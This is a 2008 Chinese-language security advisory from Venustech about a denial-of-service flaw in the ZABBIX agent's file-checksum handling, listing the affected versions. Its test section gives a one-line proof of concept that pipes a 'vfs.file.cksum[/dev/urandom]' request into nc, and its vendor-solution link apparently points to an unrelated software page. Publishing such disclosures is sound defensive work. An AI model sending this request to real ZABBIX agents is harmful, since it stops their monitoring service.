ZABBIX文件校验请求拒绝服务漏洞

安全公告

月度Top10安全漏洞

每日漏洞播报

ZABBIX文件校验请求拒绝服务漏洞

发布时间：2008-03-14 录入：启明星辰

BUGTRAQ ID: 28244
CNCAN ID:CNCAN-2008031404

漏洞消息时间:2008-03-13

漏洞起因
异常条件处理失败错误

影响系统
ZABBIX ZABBIX 1.4.3
ZABBIX ZABBIX 1.4.2
ZABBIX ZABBIX 1.1.5
ZABBIX ZABBIX 1.1.4
ZABBIX ZABBIX 1.1.3
ZABBIX ZABBIX 1.1.2

不受影响系统

危害
远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。

攻击所需条件
攻击者必须访问ZABBIX。

漏洞信息
ZABBIX是一款基于WEB的系统与网络信息监视系统。
ZABBIX处理文件校验请求存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
通过发送使用文件参数类似/dev/zero或/dev/urandom的文件校验请求，可触发此漏洞，导致服务程序停止相应。

测试方法
echo "vfs.file.cksum[/dev/urandom]" | nc localhost
echo "vfs.file.cksum[/dev/urandom]" | nc localhost
echo "vfs.file.cksum[/dev/urandom]" | nc localhost

厂商解决方案

目前没有详细解决方案提供：

http://webscripts.softpedia.com/script/Modules/Other-Modules/My-eGallery-dev-8113.html

漏洞提供者
Milen Rangelov

漏洞消息链接
http://www.securityfocus.com/archive/1/489506

漏洞消息标题
Zabbix (zabbix_agentd) denial of service

文章来源：http://www.venustech.com.cn/

回到首页 | 关闭此页

回到首页